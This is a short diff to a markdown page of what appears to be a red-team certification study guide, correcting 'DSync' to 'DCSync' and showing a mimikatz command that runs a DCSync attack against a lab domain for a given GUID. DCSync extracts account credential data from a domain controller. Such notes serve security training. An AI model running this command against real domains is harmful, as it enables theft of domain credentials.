peterrakolcza/CRTO-study-guide/Tools/mimikatz.md

 ### For Domain and GUID

-Performs a DSync attack for a specified domain and GUID.
+Performs a DCSync attack for a specified domain and GUID.

 ```
 mimikatz @lsadump::dcsync /domain:cyberbotic.io /guid:{b93d2e36-48df-46bf-89d5-2fc22c139b43}